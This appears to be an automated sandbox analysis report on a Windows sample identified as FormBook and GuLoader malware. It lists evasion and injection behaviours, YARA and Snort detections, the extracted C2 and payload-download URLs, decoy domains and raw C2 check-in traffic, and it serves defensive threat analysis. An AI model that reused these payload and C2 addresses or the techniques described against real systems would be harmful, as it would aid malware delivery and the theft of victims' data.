Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
aSsc9zh1ex.exe

Overview

General Information

Sample Name:aSsc9zh1ex.exe
Analysis ID:625008
MD5:d5e55a57372bcad45fbb260105179caf
SHA1:9b1935a927c072dd31017362ff1739bf1ea2aaf7
SHA256:3c27c2aa1bc826faa65ab4038eb385cabd6db50108410e6f674d455aa1dc5532
Infos:

Detection

FormBook, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Yara detected GuLoader
Snort IDS alert for network traffic
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Performs DNS queries to domains with low reputation
Modifies the prolog of user mode functions (user mode inline hooks)
Self deletion via cmd delete
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Tries to resolve many domain names, but no domain seems valid
Uses 32bit PE files
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
PE file contains more sections than normal
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64native
  • aSsc9zh1ex.exe (PID: 2120 cmdline: "C:\Users\user\Desktop\aSsc9zh1ex.exe" MD5: D5E55A57372BCAD45FBB260105179CAF)
    • aSsc9zh1ex.exe (PID: 7936 cmdline: "C:\Users\user\Desktop\aSsc9zh1ex.exe" MD5: D5E55A57372BCAD45FBB260105179CAF)
      • explorer.exe (PID: 4660 cmdline: C:\Windows\Explorer.EXE MD5: 5EA66FF5AE5612F921BC9DA23BAC95F7)
        • rundll32.exe (PID: 2724 cmdline: C:\Windows\SysWOW64\rundll32.exe MD5: 889B99C52A60DD49227C5E485A016679)
          • cmd.exe (PID: 4444 cmdline: /c del "C:\Users\user\Desktop\aSsc9zh1ex.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 1704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.shantelleketodietofficial.site/wn19/"], "decoy": ["intelios.xyz", "fungismartgrid.com", "wrsngh.com", "golatrak.com", "revboxx.com", "projectduckling.com", "yiwuanyi.com", "bellaigo.com", "rnrr.xyz", "dentalimplantsservicelk.com", "helixsaleep.com", "hokasneakeruse.xyz", "threads34.store", "ayanaslifeinmalaysia.com", "thebeautystore.store", "99221.net", "mc3.xyz", "coconsj.store", "abstractmouse.com", "bctp.xyz", "sura.ooo", "paradisetrippielagoon.com", "usnahrpc.com", "kbcoastalproperties.com", "whiskeyjr.com", "liesdevocalist.store", "schnellekreditfinanz.com", "katraderphotography.com", "guizhouwentuo.com", "tfp3gfekbrb9cx99.xyz", "reionsbank.com", "edwardfran.com", "grigorous.com", "linqxw.com", "proplanvetsdirect.com", "zildaalckmin.net", "herbalsfixng.xyz", "gpusforfun.com", "terra-stations.money", "anytoearn.com", "borneadomicile.com", "dtmkwd.sbs", "taakyif.com", "perrobravostudio.com", "limba6lamb.xyz", "gluideline.com", "travelchanel3d.com", "group-gr.com", "qcrcmh.com", "dujh.xyz", "screensunshincoust.com", "cnrhome.com", "getsuzamtir.xyz", "baseballportalusa.com", "laiwu-yulu.com", "repaircilinic.com", "nelvashop.com", "2228.wtf", "clickleaser.com", "jpfzaojyn.sbs", "tandelawnmaintenance.com", "actu-infomail.com", "m-a-a.xyz", "friendlyneighborholdings.com"]}

Threatname: GuLoader

{"Payload URL": "http://barsam.com.au/bin_QuCucbUMda229.bin"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000A.00000000.42010338948.000000001441C000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000A.00000000.42010338948.000000001441C000.00000040.00000001.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x5839:$sqlite3step: 68 34 1C 7B E1
    • 0x594c:$sqlite3step: 68 34 1C 7B E1
    • 0x5868:$sqlite3text: 68 38 2A 90 C5
    • 0x598d:$sqlite3text: 68 38 2A 90 C5
    • 0x587b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x59a3:$sqlite3blob: 68 53 D8 7F 8C
    0000000A.00000000.42010338948.000000001441C000.00000040.00000001.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x26a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x2191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x27a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x291f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x140c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x8917:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x991a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000007.00000000.41769049306.0000000001660000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      0000000E.00000002.46595730295.00000000043D0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
        Click to see the 18 entries

        Sigma Signatures

        No Sigma rule has matched

        Snort Signatures

        Timestamp:192.168.11.2041.203.18.17749768802031449 05/12/22-10:45:22.157985
        SID:2031449
        Source Port:49768
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.2023.227.38.7449776802031453 05/12/22-10:49:26.026441
        SID:2031453
        Source Port:49776
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.2023.227.38.7449776802031412 05/12/22-10:49:26.026441
        SID:2031412
        Source Port:49776
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.2041.203.18.17749768802031453 05/12/22-10:45:22.157985
        SID:2031453
        Source Port:49768
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.2041.203.18.17749768802031412 05/12/22-10:45:22.157985
        SID:2031412
        Source Port:49768
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.2023.227.38.7449776802031449 05/12/22-10:49:26.026441
        SID:2031449
        Source Port:49776
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Found malware configuration
        Source: 00000007.00000000.41769049306.0000000001660000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "http://barsam.com.au/bin_QuCucbUMda229.bin"}
        Source: 0000000E.00000002.46595730295.00000000043D0000.00000040.10000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.shantelleketodietofficial.site/wn19/"], "decoy": ["intelios.xyz", "fungismartgrid.com", "wrsngh.com", "golatrak.com", "revboxx.com", "projectduckling.com", "yiwuanyi.com", "bellaigo.com", "rnrr.xyz", "dentalimplantsservicelk.com", "helixsaleep.com", "hokasneakeruse.xyz", "threads34.store", "ayanaslifeinmalaysia.com", "thebeautystore.store", "99221.net", "mc3.xyz", "coconsj.store", "abstractmouse.com", "bctp.xyz", "sura.ooo", "paradisetrippielagoon.com", "usnahrpc.com", "kbcoastalproperties.com", "whiskeyjr.com", "liesdevocalist.store", "schnellekreditfinanz.com", "katraderphotography.com", "guizhouwentuo.com", "tfp3gfekbrb9cx99.xyz", "reionsbank.com", "edwardfran.com", "grigorous.com", "linqxw.com", "proplanvetsdirect.com", "zildaalckmin.net", "herbalsfixng.xyz", "gpusforfun.com", "terra-stations.money", "anytoearn.com", "borneadomicile.com", "dtmkwd.sbs", "taakyif.com", "perrobravostudio.com", "limba6lamb.xyz", "gluideline.com", "travelchanel3d.com", "group-gr.com", "qcrcmh.com", "dujh.xyz", "screensunshincoust.com", "cnrhome.com", "getsuzamtir.xyz", "baseballportalusa.com", "laiwu-yulu.com", "repaircilinic.com", "nelvashop.com", "2228.wtf", "clickleaser.com", "jpfzaojyn.sbs", "tandelawnmaintenance.com", "actu-infomail.com", "m-a-a.xyz", "friendlyneighborholdings.com"]}
        Multi AV Scanner detection for submitted file
        Source: aSsc9zh1ex.exeVirustotal: Detection: 37%Perma Link
        Source: aSsc9zh1ex.exeMetadefender: Detection: 14%Perma Link
        Source: aSsc9zh1ex.exeReversingLabs: Detection: 34%
        Yara detected FormBook
        Source: Yara matchFile source: 0000000A.00000000.42010338948.000000001441C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.46595730295.00000000043D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000000.42080260452.000000001441C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.42265914211.000000001D3A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.46593481417.0000000000530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.42240670582.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.46596157164.0000000004400000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: aSsc9zh1ex.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
        Source: aSsc9zh1ex.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
        Source: Binary string: D:\SourceCode\GC3.UserExperienceImprovement\production_V4.2\Service\ServiceSDK\Release\UserExperienceImprovementPlugin\AsSQLHelper.pdb source: AsSQLHelper.dll.1.dr
        Source: Binary string: D:\SourceCode\GC3.Overclocking\production_V4.2\Service\ServiceSDK\Release\ThrottlePlugin\AEGISIIINVHelper.pdb source: AEGISIIINVHelper.dll.1.dr
        Source: Binary string: mshtml.pdb source: aSsc9zh1ex.exe, 00000007.00000001.41771865753.0000000000649000.00000008.00000001.01000000.00000005.sdmp
        Source: Binary string: wntdll.pdbUGP source: aSsc9zh1ex.exe, 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, aSsc9zh1ex.exe, 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmp, aSsc9zh1ex.exe, 00000007.00000003.41895267490.000000001D55D000.00000004.00000800.00020000.00000000.sdmp, aSsc9zh1ex.exe, 00000007.00000003.41890350295.000000001D3AB000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000E.00000002.46597015234.0000000004630000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000E.00000002.46598617153.000000000475D000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000E.00000003.42246206237.0000000004483000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000E.00000003.42240222700.00000000042D2000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: aSsc9zh1ex.exe, aSsc9zh1ex.exe, 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, aSsc9zh1ex.exe, 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmp, aSsc9zh1ex.exe, 00000007.00000003.41895267490.000000001D55D000.00000004.00000800.00020000.00000000.sdmp, aSsc9zh1ex.exe, 00000007.00000003.41890350295.000000001D3AB000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, rundll32.exe, 0000000E.00000002.46597015234.0000000004630000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000E.00000002.46598617153.000000000475D000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000E.00000003.42246206237.0000000004483000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000E.00000003.42240222700.00000000042D2000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: rundll32.pdb source: aSsc9zh1ex.exe, 00000007.00000003.42237635887.0000000001B32000.00000004.00000020.00020000.00000000.sdmp, aSsc9zh1ex.exe, 00000007.00000002.42241289508.0000000000120000.00000040.10000000.00040000.00000000.sdmp, aSsc9zh1ex.exe, 00000007.00000003.42235969161.0000000001B24000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: rundll32.pdbGCTL source: aSsc9zh1ex.exe, 00000007.00000003.42237635887.0000000001B32000.00000004.00000020.00020000.00000000.sdmp, aSsc9zh1ex.exe, 00000007.00000002.42241289508.0000000000120000.00000040.10000000.00040000.00000000.sdmp, aSsc9zh1ex.exe, 00000007.00000003.42235969161.0000000001B24000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdbUGP source: aSsc9zh1ex.exe, 00000007.00000001.41771865753.0000000000649000.00000008.00000001.01000000.00000005.sdmp
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 1_2_00406850 FindFirstFileW,FindClose,1_2_00406850
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 1_2_00405C26 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,1_2_00405C26
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 1_2_0040290B FindFirstFileW,1_2_0040290B
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then pop esi14_2_0054730D
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then pop ebx14_2_00537B1C

        Networking

        barindex
        System process connects to network (likely due to code injection or exploit)
        Source: C:\Windows\explorer.exeNetwork Connect: 68.65.122.211 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 3.64.163.50 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 41.203.18.177 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 192.64.117.165 80Jump to behavior
        Snort IDS alert for network traffic
        Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49768 -> 41.203.18.177:80
        Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49768 -> 41.203.18.177:80
        Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49768 -> 41.203.18.177:80
        Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49776 -> 23.227.38.74:80
        Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49776 -> 23.227.38.74:80
        Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49776 -> 23.227.38.74:80
        Performs DNS queries to domains with low reputation
        Source: DNS query: www.hokasneakeruse.xyz
        Source: DNS query: www.rnrr.xyz
        Source: DNS query: www.rnrr.xyz
        Source: DNS query: www.rnrr.xyz
        Source: DNS query: www.rnrr.xyz
        Source: DNS query: www.rnrr.xyz
        Source: DNS query: www.rnrr.xyz
        Source: DNS query: www.intelios.xyz
        Source: DNS query: www.herbalsfixng.xyz
        C2 URLs / IPs found in malware configuration
        Source: Malware configuration extractorURLs: www.shantelleketodietofficial.site/wn19/
        Source: Malware configuration extractorURLs: http://barsam.com.au/bin_QuCucbUMda229.bin
        Tries to resolve many domain names, but no domain seems valid
        Source: unknownDNS traffic detected: query: www.reionsbank.com replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: www.kbcoastalproperties.com replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: www.thebeautystore.store replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: www.rnrr.xyz replaycode: Server failure (2)
        Source: unknownDNS traffic detected: query: www.taakyif.com replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: www.gpusforfun.com replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: www.liesdevocalist.store replaycode: Server failure (2)
        Source: unknownDNS traffic detected: query: www.ayanaslifeinmalaysia.com replaycode: Server failure (2)
        Source: unknownDNS traffic detected: query: www.shantelleketodietofficial.site replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: www.sura.ooo replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: www.perrobravostudio.com replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: www.hokasneakeruse.xyz replaycode: Name error (3)
        Source: Joe Sandbox ViewASN Name: xneeloZA xneeloZA
        Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
        Source: global trafficHTTP traffic detected: GET /wn19/?jZf=NS202dJbEEETcB12VfvBfMMdjzaMJ2P7TP19ar/APX8BBmPLqx20W3tmhoszgkcRlb4O&1biX=C2MPnN HTTP/1.1Host: www.fungismartgrid.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /wn19/?jZf=QQL+SjwgUyPYxJnw2qa+Hze/zpoAw1vY2ZXVt5QHdkoKCL+B47r8V4uCmI0quTqEBnpn&1biX=C2MPnN HTTP/1.1Host: www.intelios.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /wn19/?jZf=/aPRIOivZv/SK3yyBSrwMHS3aEcDnGoJdVwaw0Jv+PFvpIBjQ3dFVdba2CvjMIDrv82h&1biX=C2MPnN HTTP/1.1Host: www.herbalsfixng.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /wn19/?jZf=VPEU4GtrlSiNcAkb3jQiBQiB6wsnkRv+1lt8CI/dwo4hrc1cBv2ecJ2q6A5CexHOXEVq&1biX=C2MPnN HTTP/1.1Host: www.schnellekreditfinanz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /wn19/?jZf=74kz/+Omydv/tJV+ps5/T47bI5nxKh+DjdkrvIsUcwHn/m5f3NJjyQUUG1A7gP1GNjyQ&k0=p8cH HTTP/1.1Host: www.nelvashop.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /wn19/?jZf=rv1HgXCmNvTRWnk0t/PWMZTArWSxwY6VToXu23C5wd0SYVqo5hbnUnFufPtPTohMYlmc&k0=p8cH HTTP/1.1Host: www.threads34.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: Joe Sandbox ViewIP Address: 41.203.18.177 41.203.18.177
        Source: global trafficHTTP traffic detected: GET /bin_QuCucbUMda229.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: barsam.com.auCache-Control: no-cache
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 May 2022 08:45:22 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 12 May 2022 08:49:05 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Sorting-Hat-PodId: 178X-Sorting-Hat-ShopId: 62108663987X-Dc: gcp-europe-west1X-Request-ID: 550f7f4f-456b-4f4f-8965-3ea51e57b588X-XSS-Protection: 1; mode=blockX-Download-Options: noopenX-Content-Type-Options: nosniffX-Permitted-Cross-Domain-Policies: noneCF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 70a1e629cab2915e-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 74 65 78 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 6d 61 69 6e 7b 66 6c 65 78 3a 31 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 61 6c Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 12 May 2022 08:49:26 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Sorting-Hat-PodId: 152X-Sorting-Hat-ShopId: 60890513561X-Dc: gcp-europe-west1X-Request-ID: 02e2ed5e-cb87-4eff-bfdf-9330f6164dc4X-Download-Options: noopenX-Content-Type-Options: nosniffX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockCF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 70a1e6a9ab9f900a-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 